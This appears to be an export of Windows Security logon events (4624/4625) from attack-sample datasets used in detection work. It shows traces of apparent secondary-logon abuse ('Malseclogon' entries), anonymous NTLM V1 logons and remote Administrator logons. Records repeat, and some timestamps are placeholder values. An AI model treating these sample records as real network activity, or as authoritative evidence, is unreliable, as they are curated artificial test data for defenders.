+ 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 
768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" 
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ 
+ WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 
0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" 
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + 
+ + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT 
AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + 
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 
01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 
+ 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 
+ 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 329918 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 9 + seclogo + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1bc4 + C:\Windows\System32\svchost.exe + ::1 + 0 + %%1833 + - + MalseclogonUser + MalseclogonDomain + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 
0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 